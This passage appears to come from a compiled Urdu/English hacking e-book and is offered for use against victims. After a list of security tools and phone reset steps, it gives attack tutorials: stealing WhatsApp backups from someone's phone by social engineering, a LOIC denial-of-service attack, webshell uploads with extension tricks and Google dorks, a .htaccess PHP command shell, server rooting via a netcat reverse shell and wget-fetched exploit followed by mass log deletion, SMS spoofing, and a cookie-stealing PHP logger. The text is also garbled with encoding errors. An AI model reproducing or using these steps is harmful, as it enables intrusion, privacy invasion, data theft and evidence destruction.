security.Some of such vulnerability scanners include Shadow Security Scanner,Stealth HTTP Scanner, Nessus, etc. Visit http://www.securityfocus.com vulnerabilities and exploit codes of various operating systems. Packet storm security (http://www.packetstormsecurity.com) is also a nice pick.Tools Descriptions:1. Nmap I think everyone has heard of this one, recently evolved into the 4.x series. Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.Can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results. Get Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 223
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Nmap Here - http://www.insecure.org/nmap/download.html 2. Nessus Remote Security Scanner Recently went closed source, but is still essentially free. Works with a client- server framework. Nessus is the worlds most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the worlds largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications. Get Nessus Here http://www.nessus.org/download/3. John the Ripper Yes, JTR 1.7 was recently released! John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches. You can get JTR Here http://www.openwall.com/john/ 4. Nikto Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those). Get Nikto Here http://www.cirt.net/code/nikto.shtml 5. SuperScan Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan. If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice. Get SuperScan Here http://www.foundstone.com/index.htm subnav=resources/navigation.htm&subcontent=/resources/proddesc/supersca n4.htm 6. p0f P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on: - machines that connect to your box (SYN mode),- machines you connect to (SYN+ACK mode),- machine you cannot connect to (RST+ mode),- machines whose communications you can observe. Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine. Get p0f Here http://lcamtuf.coredump.cx/p0f/p0f.shtml 7. Wireshark (Formely Ethereal) Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later. Get Wireshark Here http://www.wireshark.org/8. Yersinia Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).The best Layer 2 kit there is Get Yersinia Here - http://yersinia.sourceforge.net/ 9. Eraser Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 224
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License. An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass. Get Eraser Here http://www.heidi.ie/eraser/download.php 10. PuTTY PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4. 0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients. Get PuTTY Here. http://www.chiark.greenend.org.uk/~sgtatham/putty/ 11. LCP Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing. A good free alternative to L0phtcrack. LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article. Get LCP Here http://www.lcpsoft.com/english/download.htm 12. Cain and Abel My personal favourite for password cracking of any kind. Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. Get Cain and Abel Here - http://www.oxid.it/cain.html 13. Kismet Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.A good wireless tool as long as your card supports rfmon (look for an orinocco gold). Get Kismet Here http://www.kismetwireless.net/download.shtml 14. NetStumblerYes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving. NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:Verify that your network is set up the way you intended. Find locations with poor coverage in your WLAN. Detect other networks that may be causing interference on your network. Detect unauthorized rogue access points in your workplace. Help aim directional antennas for long-haul WLAN links. Use it recreationally for WarDriving. Get NetStumbler Here http://www.stumbler.net/ 15. Hping To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills. hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features. Get hping Here - http://www.hping.org/ Hack Tutrial:How to Easily Master Format HTC 8X Windows Phone with Safe Hard Reset ? #Option 1, Hard Reset HTC 8X Windows Phone with software menu: 1. Turn on the HTC 8X Windows Phone Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 225
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 2. 3. 4. 5. 6. 7.
Make sure the important data already backup properly Make sure the battery is not empty Go to Menu : Setting > About Choose : reset your phone Choose : yes The HTC 8X Windows Phone will do hard reset with master format.
#Option 2, Hard Reset HTC 8X Windows Phone with Hardware Key Button (please follow continually from STEP by STEP) : >> STEP 1 (Preparation) : 1. Make sure your important data already backup 2. Make sure the battery is full or not empty 3. Turn off the HTC 8X Windows Phone >> STEP 2 : 1. Press and hold : Volume Down Button 2. Continue press once : Power Button (do not release Volume Down button) 3. If the LCD appear Icon picture, the you can release the Volume Down button >> STEP 3 : 1. 2. 3. 4. 5. 6.
You can release all button at STEP 2 above Press and release carefully4 button bellow: Press : Volume Up button (then release) Press : Volume Down button (then release) Press : Power Button button (then release) Press : Volume Down button (then release)
Hack Tutrial:HOW TO UNLOCK A PATTERN LOCK OF QMOBILE A2 LITE 1_ PUT SET IN FASTBOOT 2_CONECT USB CABLE 3_INSTAL DRIVERS4_RUN MULTI TOOL5_ PRESS 8 AND PRESS ENTER ( FROM UR PC KEYBOARD )6_SET WILL BE REBOOT DONE Hack Tutrial:HOW TO HARD RESET OF A6 NOIR BY QMOBILE 1) First of all power of mobile.2) Remove battery from phone and insert it back. 3) Press vol up&down togeather.4) Press power on button and wait for 3 second. 5) Select recovery mode. 6) Press menu button. 7) Appear android logo on secreen.8) Then select what you want. Hack Tutrial:HACK WHATSAPP ACCOUNT Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 226
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
On Daily we have heard news about online services is suffering from a lack of security. In February WhatsApp has been down for nearly four hours, as if this were not enough, people became aware of the security flaw that allows conversations that should be read by anyone provided it learn properly perform the procedures. Steps to follow: 1 - First of all you need to have the device at hand, use the Social Engineering and be quick in getting the e-mail and backup files msgstore-2014-05-02.1.db.crypt5. To get the email for this follow the procedures below. Enter the Play Store and view the e-mail, or write down mentalize somewhere without the person noticing.
Now Go to the device settings from Settings -> Accounts & Sync, look for the email from Google and mentalize or write down somewhere without the person noticing.
2 - Now let's take the msgstore-2014-0508.1.db.crypt7 file To do this, use Polaris Office or any other app that allows you to navigate between folders and manage files. Follow this path: My files -> WhatsApp -> Databases - In this directory you will find all the backup files of your messenger. When you do find the file sharing for your mobile phone via bluetooth.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 227
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
3 - Have we got the e-mail and file backup http://whatcrypt.com/?cmd=_decrypt we enter the site and send the backup file. To Submit follows: Account: Enter the email of the victim Database: Select the database backup Click Process / download zip Save the zip file on your desktop
4 - Once you have downloaded the backup file in zip format we now need to download the tool to extract the backup and we have access to conversations. Save on the
desktop. WhatsApp Decrypt MediaFire: http://www.mediafire.com/download/hw7m1590ld27vd5/WhatsApp_Decrypt.r ar Scanner Virus Total: https://www.virustotal.com/pt/file/c58bbef257e1ada303478b468a2b68523cbd 307e1620d76d53489763e0ef5e15/analysis/1399523236/ 5 - From the desktop to extract the file WhatsApp Decrypt.zip install python-3.4.0 folder and enter the WhatsApp. Browse by: WhatsApp -> Whatsapp_Xtract_V2.1_2012-05-10-2
When you install python-3.4.0 do the following steps:1 - Go to My Computer, click with the right mouse button and Properties -> Advanced System Settings2 - In the System Properties navigate to the Advanced tab -> Environment Variables3 Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 228
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Environment Variables look for Path4 - Edit the PATH5 - At the end of PATH add ;C:\Python346 - Click ok and close
6 - Now extract the file from step 3 msgstore_decrypted on the desktop, copy and paste it on WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 and replace the file
7 - Replace the WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 from step 5 and look for msgstore.dll file, drag it onto the whatsapp_xtract_drag'n'drop_database
file (s) _here After you drag it will create a file called msgstore.db.html the folder and ask you to press any key at the command prompt to continue ... Pressing any key it will open in your default browser displaying the file msgstore.db.html all conversations, dates, numbers, etc.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 229
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Note: In step 2 print shows the crypt 7 but the crypt is correct 5! Disclaimer: This tutorial is educational purpose only. HOC is not responsible for any kind of illegal activities. We believe in Security.Tahir Blog 速 Hack Tutrial:page visit increase + proxies 45k+ simply tool download karien ore is ka bad proxy likh kar url site liken ore start button kar dien. download link: http://www.4shared.com/rar/oqwJubwhce/tk_view_enhancerproxy.html example to increase ranking is: http://www.dailymotion.com/video/x2asqyg_meri-zindagi-tofiraaq-ha-by-tahir_music Hack Tutrial:EXECUTE OR ACCESS YOUR .JPG SHELL After hacking the admin panel of the website, find a place to upload image. from there instead of image you can upload your shell. Sometimes .php files are not allowed or there are restrictions on uploading .php files, So inorder to upload and execute for shell you have to change the extension of your shell.Open your shell in notepad and then Save As and change the extension to any any one of the shell.php;.jpg shell.php.jpg shell.php..jpg shell.php.jpg shell.php.jpg:; shell.php.jpg%; shell.php.jpg; shell.php.jpg; shell.php.jpg:;
Suppose you have uploaded your shell in image section of the website, You will find your shell most of times here http://website/images/shell.php If there is no upload section in the administrator panel of the website but there is a section where you can update or add news, you can use meta http-equiv to make redirection from website to your deface page. Just add this code in news <meta http-equiv="refresh" content="0;url=http://link_to_your_deface_page"> Hack Tutrial:Upload your Shell or Find already uploaded Shells.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 230
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Google Dork: "Index of /sh3llZ" "/sh3llZ/uploadshell/uploadshell.php" intitle:index of/sh3llZ Use both Google search and bing search to find more result to upload your own shell or find already uploaded shells. After opening the search result you can upload your own shell or deface there, or even use already uploaded shell. Hack Tutrial:Arbitrary or Unrestricted File Upload Arbitrary or Unrestricted File Upload is a type of web application vulnerability which occurs due to improper validation of the file which is being uploaded on the server
Suppose there is a website which allows users to upload image files with the extension like .jpg, .png, .gif and so on, but if the website is unable to properly verify the image file being uploaded, an attacker can take control over the whole website/server. This is especially true for files with the extension .php & .asp because they are automatically executed by the server. So in this post I will be explaining you how this vulnerability is caused by studying the source code. This post has been written keeping in mind that you are new to this type of vulnerability, so examples which will be explained will be basic ones. Advanced example will be posted in PART 2 of this post. ExampleThe following is an HTML upload forum which allows pictures to be uploaded on the server. <form action="upload.php" method="post" enctype="multipart/formdata"> Choose a file to upload: <input type="file" name="filename"/>
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 231
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree <br/> <input type="submit" name="submit" value="Submit"/> </form> When the file is submitted, it is send to upload.php on the server. The file is been stored in a temporary location until it is retrieved by the server side code. So after the file is uploaded, it is sent to a permanent directory or location through upload.php // Define the target location where the picture being // uploaded is going to be saved. $target = "pictures/" . basename($_FILES['uploadedfile']['name']);
// Move the uploaded file to the new location. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target)) { echo "The picture has been successfully uploaded."; } else { echo "There was an error uploading the picture, please try again."; } The problem with the above code is that, the file type is not verified which is being uploaded, as a result an attacker can upload a malicious file on the server. Once the malicious file is uploaded on the server, arbitrary command execution is possible. Well, a simple solution to patch this type of problem is to check for MIME type in the uploaded request. if($_FILES['userfile']['type'] != "image/gif") { echo "Sorry, we only allow uploading GIF images"; exit; } Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 232
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Well this method too can be bypassed by the manipulation of Request Header allowing What can be done instead is that use PHP functions to check that the file type is indeed of desired type, for example: ‗getimagesize()‘ function of PHP takes a file name as an argument and returns the size and type of the image Some File Upload Vulnerabilities : http://www.hackingsec.in/2013/04/tinymceajaxfilemanager-shell-upload.html http://www.hackingsec.in/2012/03/tmedit-popuop-new-deface-andshell.htmlhttp://www.hackingsec.in/2012/03/testing-imageshell-and-defaceupload.html http://www.hackingsec.in/2012/03/file-manager-remote-shell-anddeface.html http://www.hackingsec.in/2012/02/fckeditor-remote-file-uploadexploit.html http://www.hackingsec.in/2012/01/file-thingi-deface-and-shellupload.html http://www.hackingsec.in/2012/01/another-deface-and-shell-upload.html http://www.hackingsec.in/2012/01/defaceshell-and-image-upload.html Hack Tutrial:HACK A WEBSITE WITH DENIAL OF SERVICE ATTACK (DOS)
In this post I will be telling you how to hack a website using DoS (Denial of Service). It is tottally different from Website Defacement. It is a method to bring a website temprorely down or unavaiable which does allow users visiters to browser the website. To get a detailed explanition about DoS attacks read our post DENIAL OF SERVICE(DOS) ATTACK-EXPLAINED.For this tutorial I will be using a famous DoS tool named LOIC (Low Orbit Ion Cannon) created and coded by Anonymous Hackers.Download LOIC (Low Orbit Ion Cannon)
Step 1. Type the Target URL in the URL BoxStep 2. Click on LOCKONStep 3. Change the threads to 9001 to getting the maximum success.Step 4. Click the big button " IMMA FIRIN MAH LAZAR!" Hack Tutrial:upload exploit FCKeditor: Remote file upload exploit. Dork: intitle:"FCKeditor - Uploaders Tests" Exploit:http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html By searching this dork you will get many websites, goto to the above mentioned URL and you will get the FCKeditor there. Change the file uploader to PHP then select your .txt deface and click on send it to the server. If the file is uploaded sucessfully you will get a alert saying "File Uploaded with no errors" . See you deface here:http://www.website.domain/userfiles/yourfilehere Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 233
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree http://www.website.domain/path/userfiles/yourfilehere Note: Some websites even allow to upload .html and .jpg files also. Hack Tutrial:.htaccess Shell | How To Hide Your Shell TODAY I WILL BE TELLING YOU ALL A LESS KNOW TRICK IN WHICH YOUR CAN USE .HTACCESS FILE ON YOUR ALREADY BACKDOORED SERVER AS A SHELL TO EXECUTE OS COMMANDS , SO JUST FOLLOW THE SIMPLE STEPS DESCRIBED BELOW .OPEN YOUR PHP WEB SHELL , NAVIGATE TO PUBLIC _HTML DIRECTORY AND SEARCH FOR .HTACCESS FILE, ONCE FOUND , CLICK ON EDIT OPTION . AFTER CLICKING ON THE EDIT OPTION, ADD THE FOLLOWING LINES OF CODE IN YOUT .HTACCESS FILE.
<Files ~ "^\.ht"> Order allow,deny Allow from all </Files> AddType application/x-httpd-php .htaccess # <?php passthru($_GET['cmd']); ?>
After adding your codes, save it, and you are done ! :D Now in order to use your .htaccess shell http://www.your-hacked-website.com/.htaccess?cmd=ls After ?cmd= you can execute any OS command of your choice. Hack Tutrial:SERVER ROOTING TUTORIAL Hi guys today i will tell you how to root a server in few easy steps . Things Required : *NetcaT *Shelled site *Local root expl0it Step By Step Tutorial :First go to Run & type cmd then type : cd C:\Program Files\Netcat ( Make sure that you Netcat is saved in the following directory )
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 234
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Now Type : nc -n -l -v -p 443 , then it would show like the image shown below
Its time to open your shell & then connect using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below
So you have successfully connected .. Then now we have to get our Local Root Exploit, like mine is 2.6.18-374 2011 In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder . Type this command to change dir to /tmp : cd /tmp To upload your your exploit we will use wget function . Type : wget http://www.somesite.com/exploit.c Now this will upload the exploit in the tmp folder
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 235
Power Of Hackingツョ Facebook:https://www.facebook.com/HAckingRouterwifiFree
(Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command . Type : gcc exploit.c -o exploit Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit. (Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command . nType: unzip exploit.zip After we have done all the above steps correctly, its time to give permission so we will type the following command Type: chmod 777 exploit Now its time to run the Exploit, to run the exploit we will type the following command Type: ./exploit Now the exploit will run & the server will be rooted ;) . To check weather we got root we can type Type: id or whoami Clearing Logs:Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files . rm -rf /tmp/logs rm -rf $HISTFILE rm -rf /root/.ksh_history rm -rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /root/.bash_logout rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /var/run/utmp rm -rf /var/logs rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp rm -rf /etc/utmp history 窶田 find / -name *.bash_history -exec rm -rf {} \; find / -name *.bash_logout -exec rm -rf {} \; find / -name "log*" -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \; Hack Tutrial:HOW TO UPLOAD YOUR SHELL IN JOOMLA WEBSITES In this tutorial I will be telling you how to upload your shell after getting access into the Joomla Panel. Just follow the screenshots to succesfully upload your shell.1. First off all Login into your Joomla Panel by entering the login details.
2. When You Will be logged in, you will see a page like this.
3. See on Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 236
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree the top and look for the option named Extension. Click on it and Select Template Manage
4. After Clicking on Template Manager, Your Joomla panel will show up the following as shown in the picture below
5. From there choose any template and click on it, In my case I choose berk. Afer clicked on berk the following screen will came.
6. See the top right of the Panel, you will see a option named Edit HTML. Click on that
7. Here you will see the source codes of the template. Now replace these codes with your shell's source code and click on save. Now you can access you shell. The path of your shell will be www.site.com/templates/beez/index.php Hack Tutrial:How To Upload Your Shell On Wordpress Websites You an gain access yo admin panel of wordpress website via symlink. In this tutorial I will be telling you how to upload your shell after gaining the admin access.1. Login into the wordpress admin panel. Goto http://www.site.com/wp-admin/
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 237
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
or http://www.site.com/wp-login/
2. Now on the left
hand side look for the option Appreance. 3. Click on Appreance after that you will get a option "Editior" click on that after clicking on
Appreance. 4. After clicking on "Editior" under Appearance you will get the following screen with the source code of the theme. Now see Right slider bar and click on any option like 404.php or comments.php
5. Replace the source codes with the codes of your shell and click on upload You wil get your shell uploaded here http://www.site.com/wpcontent/themes/themename/yourshell.php Hack Tutrial:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 238
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 239
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Hack Tutrial:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 240
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 241
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 242
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 243
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 244
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Hack Tutrial:mufeed sites hacking ke :http://www.wikihow.com/Hack-a-Website-with-Basic-HTML-Coding http://mtahirzahid.blogspot.com http://mtahirzahidsu.blogspot.com https://wiki.eveonline.com/en/wiki/Hacking_sites http://www.hackforums.net/ http://en.wikipedia.org/wiki/Hacker_%28computer_security%29 http://growthdevil.com/20-great-sites-growth-hacking/ http://www.darknet.org.uk/ http://www.nirsoft.net/ http://securityxploded.com/ http://en.wiktionary.org/wiki/hack http://sellhack.com/ Milw0rm Hack a day Security Focus ASTALAVISTA - secuirt y & hacking community PacketStorm Security Black Hat Metasploit Project .Insecure.org: Top 75 Security tools 2600 Store Rootkit http://cnqzu.com/library/Anarchy%20Folder/Computers/Hacking,%20Security/ http://www.hackershandbook.org/1000/ http://repo.hackerzvoice.net/depot_cehv6/ http://library.back2hack.cc/books/Hacking/ http://fringe.davesource.com/Fringe/Hacking/Hacks/ http://cd.textfiles.com/cuteskunk/unsorted-zines/hacking-textfiles/ Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 245
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Hack Tutrial:Café net free:process explorer ya cafesuspender ko download karien.is ka ka bad tool ko open karien ore café.exe ko pause kar dien ore free net enjoy karien. Hack Tutrial:Fake sms and voice:CREATE MANY NEXMO ACCOUNT WITH ONE EMAIL COMPLETE METHOD IN URDU 1 hi Email Account se bohat se nexmo account bananey ka tariqa ::.Assalam O Alaikum Dosto......... Aj kal nexmo account sirf Business email pr ban rahy hain lekin main yahan Gmail account use kr raha hun as a sample. Umeed krta hun ap sab ko achi trha se samaj aaaye gi aur ap khud nexmo account bna sako gay. is tip ka faida ye hai k Gmail k aap ko bohat se accounts nahi bananey paren ge balke 1 hi email se aap bohat se nexmo accounts bana saken ge.Tip ye hai k pehle normally aap apne email se 1 nexmo ka account bana len.phr dosrey account k liye aap apne email me "@" se pehle "+" (plus sign) laga kar koi b unique name likh kar phr @gmail.com laga kar nexmo me use karen. Nexmo is + wale email ko new email treet kare ga.yani suppose aap ka email testing@gmail.com hai to aap testing k baad + ka sign laga kar koi b unique name likh den jese me one istamal karta hon tu ye new email name baney ga testing+one@gmail.com or nexmo is account ko new email treat kare ga.or +one waley email ki b sari emails aap ko testing@gmail.com per mosool hon gi. Hack Tutrial:Sites fake sms:-
*Fake SMS Webs. www.Nexmo.com www.Tropo.com www.Twilio.com www.Plive.com www.TelApi.com www.ITalkYou.com *NEXMO k SMS JAZZ Par +44 No. Se Hi Aa Rahay Hain. Baqi All Networks Aur Whole World Main jis Name Se Bhejo Gay Usi Se Jayen Gay. Sirf Jazz Par Aesa Hy.. Hack Tutrial:HACKING ACCOUNTS BY COOKIELOGGER Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 246
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Home Windows o Twittwe o CNIC Data o Information o Internet Hacking o PC Networking o Wifi o Facebook Hack o Opera Hack o Cookie Logger o Click Jacking o Key Logger Mobile o Mobilink o Zong o Ufone o Telenor o Warid o Nokia o Samsung o China o Google o LG o Sim Package o All Nokia o Java Tricks o Tips o Earning o PC Tips o Blogger o Crack o Blocking Facebook In Urdu SiteMap
Our Mission Is Provide You Better Faster & Secure Way For Daily Facebook, Mobile And Computer Related Tips And Tricks,"Bookmark Us CTRL+D" FOLLOW BY EMAIL
Home » CookieLoger » Hacking » KeyLogger » Hacking Accounts By CookieLogger
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 247
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree HACKING ACCOUNTS BY COOKIELOGGER Asim Ansari Add Comment CookieLoger, Hacking, KeyLogger Saturday, December 28, 2013
Assalam-0-Alaikum ,
W HAT IS COOKIELOGGER ? A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show :
: : HOW TO MAKE YOUR OWN COOKIE LOGGER : : Hope you will enjoy Reading and Implementing it ...
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 248
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree You Need A Free web hosting site If you don't have any Website then you can use any one of these : http://www.1freehosting.com/ http://www.2freehosting.com/ http://www.5gbfree.com/ http://www.byethost.com/ google for more.. Need Free Domain Name ? Use
http://dot.tk
Note: You Need To Change The Nameservers to the web host Nameservers you are going to Use . STEP - BY - STEP : 1 - Copy the Below Code & Save the notepad file and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> 2 - Copy the Following Script into a Notepad File and Save the file as cookielogger.php ? 1 $filename = “logfile.txt”; 2 if (isset($_GET["cookie"])) 3 { 4 if (!$handle = fopen($filename, „a‟)) 5 { 6 echo “Temporary Server Error,Sorry for the inconvenience.”; 7 exit; 8 } 9 else 10{ 11if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 249
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree 12{ 13echo “Temporary Server Error,Sorry for the inconvenience.”; 14exit; 15} 16} 17echo “Temporary Server Error,Sorry for the inconvenience.”; 18fclose($handle); 19exit; 20} 21
echo “Temporary Server Error,Sorry for the inconvenience.”;
22
exit;
23
?>
